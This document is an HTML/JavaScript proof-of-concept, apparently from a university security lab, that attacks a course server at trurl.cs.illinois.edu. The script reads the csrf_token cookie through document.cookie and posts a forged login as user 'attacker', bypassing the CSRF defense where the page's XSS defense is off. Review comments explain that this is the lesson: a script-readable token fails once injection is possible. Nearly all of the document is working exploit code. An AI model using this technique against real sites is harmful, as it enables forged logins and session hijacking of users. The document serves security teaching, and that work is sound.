- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
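/**
 * Return the value of the cookie called `cname` from document.cookie.
 *
 * The name has to match at the start of a "name=value" pair. A plain
 * "contains" test would let an unrelated cookie whose name merely ends in
 * `cname` (for example "xsid" when asked for "sid") answer the lookup, and
 * the value cut out of it would be wrong.
 *
 * document.cookie only lists cookies that are in scope for the current
 * document and are not flagged HttpOnly, so an empty result can also mean
 * the cookie exists but is hidden from script.
 *
 * @param {string} cname - Exact cookie name to look for.
 * @returns {string} The raw (not URL-decoded) value, or "" when no matching
 *     cookie is visible.
 */
function getCookie(cname) {
  var prefix = cname + "=";
  var pairs = document.cookie.split(";");
  for (var i = 0; i < pairs.length; i++) {
    var pair = pairs[i];
    // Pairs are joined with "; ", so strip the leading spaces before comparing.
    while (pair.charAt(0) === " ") {
      pair = pair.substring(1);
    }
    // Anchor the match at position 0 so only the cookie *name* is compared.
    if (pair.indexOf(prefix) === 0) {
      return pair.substring(prefix.length);
    }
  }
  return "";
}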
/**
 * Submit the login form fields to the /login endpoint with jQuery's $.ajax.
 *
 * The username and password are fixed values; only the CSRF token varies.
 * Nothing is returned and the response is not inspected.
 *
 * Review note: the endpoint is addressed over plain http, so the credentials
 * and the token travel unencrypted. The server-side check can only be as
 * strong as the secrecy of `token`: if script running in the page can obtain
 * it, the token no longer distinguishes a genuine form submission from a
 * scripted one.
 *
 * @param {string} token - Value sent as the `csrf_token` form field.
 */
function post(token) {
  var loginFields = {
    username: "attacker",
    password: "l33th4x",
    csrf_token: token
  };
  var request = {
    type: "POST",
    url: "http://trurl.cs.illinois.edu/login?csrfdefense=1&xssdefense=0",
    dataType: "text",
    data: loginFields
  };
  $.ajax(request);
}
// On DOM ready: request the site's front page, then read the csrf_token
// cookie and hand it to post().
//
// Review note: the GET presumably exists so that the response sets the
// csrf_token cookie (the Set-Cookie header is not visible here, confirm
// against the server). Reading that cookie through document.cookie only works
// when this script runs in the cookie's own origin and the cookie is not
// HttpOnly; the xssdefense=0 flag in the URL suggests that is the premise of
// the exercise. The defensive takeaway is that a CSRF token readable by
// in-origin script gives no protection once script injection is possible, so
// the injection has to be closed as well as the token check kept.
$(document).ready(function () {
  function replayToken() {
    var csrfValue = getCookie("csrf_token");
    post(csrfValue);
  }

  var pageRequest = {
    type: "GET",
    url: "http://trurl.cs.illinois.edu/?csrfdefense=1&xssdefense=0",
    success: function () {
      replayToken();
    }
  };
  $.ajax(pageRequest);
});
- </script>